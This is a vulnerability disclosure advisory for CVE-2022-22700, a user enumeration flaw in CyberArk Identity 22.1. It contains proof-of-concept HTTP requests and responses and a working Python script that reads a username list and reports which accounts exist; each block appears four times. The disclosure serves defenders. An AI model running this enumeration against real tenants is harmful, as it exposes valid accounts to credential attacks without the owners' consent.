

Advisories

CyberArk Identity 22.1 - User Enumeration

5,3

Medium

Discovered by

Andres Roldan

Offensive Team, Fluid Attacks

Summary

Full name

CyberArk Identity 22.1 User Enumeration

Code name

Porter

State

Public

Affected product

CyberArk Identity

Affected version(s)

22.1 and below

Fixed version(s)

22.2

Vulnerability name

User Enumeration

Vulnerability type

225. Proper Authentication Responses

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 base score

5.3

Exploit available

Yes

CVE ID(s)

CVE-2022-22700

Description

CyberArk Identity versions up to and including 22.1 in the StartAuthentication resource, exposes the response header X-CFY-TX-TM. In certain configurations, that response header contains different, predictable value ranges which can be used to determine wether a user exists in the tenant.

Proof of Concept

A request is sent with a known valid user

Request:

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"admin@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"admin@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"admin@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"admin@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 109

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 109

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 109

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 109

In the cases when the user exists, the value of X-CFY-TX-TM is always less than 500.

A request is sent with a non existent user

Request:

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"notexists@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"notexists@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"notexists@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

POST /Security/StartAuthentication HTTP/1.1
Host: customer.my.idaptive.app
Content-Length: 147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json

{"TenantId":"","User":"notexists@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 1492

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 1492

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 1492

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/json; charset=utf-8
X-CFY-TX-TM: 1492

In the cases when the user does not exist, the value of X-CFY-TX-TM is always above than 1000.

Exploit

The following code was used to enumerate valid users:

#!/usr/bin/env python
#
# Author: aroldan@fluidattacks.com

import json
import requests
import sys

URL = 'https://<customer>.my.idaptive.app/Security/StartAuthentication'
RAW_DATA =  '{"TenantId":"","User":"test@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}'
JSON_DATA = json.loads(RAW_DATA)

with open(sys.argv[1], 'r') as fd:
    USERS = [x.rstrip() for x in fd.readlines()]

for USER in USERS:
    VALUE = 10000
    PAYLOAD = JSON_DATA
    PAYLOAD['User'] = USER
    RESP = requests.post(URL, json=PAYLOAD)
    if 'X-CFY-TX-TM' in RESP.headers:
        VALUE = int(RESP.headers['X-CFY-TX-TM'])
    if VALUE < 1000:
        print(VALUE)
        print(f'[+] User {USER} exists.')
    else:
        print(f'[-] User {USER} not exists.')

#!/usr/bin/env python
#
# Author: aroldan@fluidattacks.com

import json
import requests
import sys

URL = 'https://<customer>.my.idaptive.app/Security/StartAuthentication'
RAW_DATA =  '{"TenantId":"","User":"test@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}'
JSON_DATA = json.loads(RAW_DATA)

with open(sys.argv[1], 'r') as fd:
    USERS = [x.rstrip() for x in fd.readlines()]

for USER in USERS:
    VALUE = 10000
    PAYLOAD = JSON_DATA
    PAYLOAD['User'] = USER
    RESP = requests.post(URL, json=PAYLOAD)
    if 'X-CFY-TX-TM' in RESP.headers:
        VALUE = int(RESP.headers['X-CFY-TX-TM'])
    if VALUE < 1000:
        print(VALUE)
        print(f'[+] User {USER} exists.')
    else:
        print(f'[-] User {USER} not exists.')

#!/usr/bin/env python
#
# Author: aroldan@fluidattacks.com

import json
import requests
import sys

URL = 'https://<customer>.my.idaptive.app/Security/StartAuthentication'
RAW_DATA =  '{"TenantId":"","User":"test@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}'
JSON_DATA = json.loads(RAW_DATA)

with open(sys.argv[1], 'r') as fd:
    USERS = [x.rstrip() for x in fd.readlines()]

for USER in USERS:
    VALUE = 10000
    PAYLOAD = JSON_DATA
    PAYLOAD['User'] = USER
    RESP = requests.post(URL, json=PAYLOAD)
    if 'X-CFY-TX-TM' in RESP.headers:
        VALUE = int(RESP.headers['X-CFY-TX-TM'])
    if VALUE < 1000:
        print(VALUE)
        print(f'[+] User {USER} exists.')
    else:
        print(f'[-] User {USER} not exists.')

#!/usr/bin/env python
#
# Author: aroldan@fluidattacks.com

import json
import requests
import sys

URL = 'https://<customer>.my.idaptive.app/Security/StartAuthentication'
RAW_DATA =  '{"TenantId":"","User":"test@customer.com","Version":"1.0","AssociatedEntityType":"Portal","AssociatedEntityName":"Portal","ZsoSessionId":""}'
JSON_DATA = json.loads(RAW_DATA)

with open(sys.argv[1], 'r') as fd:
    USERS = [x.rstrip() for x in fd.readlines()]

for USER in USERS:
    VALUE = 10000
    PAYLOAD = JSON_DATA
    PAYLOAD['User'] = USER
    RESP = requests.post(URL, json=PAYLOAD)
    if 'X-CFY-TX-TM' in RESP.headers:
        VALUE = int(RESP.headers['X-CFY-TX-TM'])
    if VALUE < 1000:
        print(VALUE)
        print(f'[+] User {USER} exists.')
    else:
        print(f'[-] User {USER} not exists.')

Credits

The vulnerability was discovered by Andrés Roldán from the Offensive Team of Fluid Attacks.

References

Vendor page https://www.cyberark.com/resources/cyberark-identity/
Changelog https://docs.cyberark.com/ProductDoc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/ReleaseNotes-Latest.htm

Timeline



28 de set. de 2021

Vulnerability discovered



5 de fev. de 2022

Vendor contacted



16 de fev. de 2022

Vendor replied



28 de fev. de 2022

Vulnerability patched



3 de mar. de 2022

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Consulta IA sobre Fluid Attacks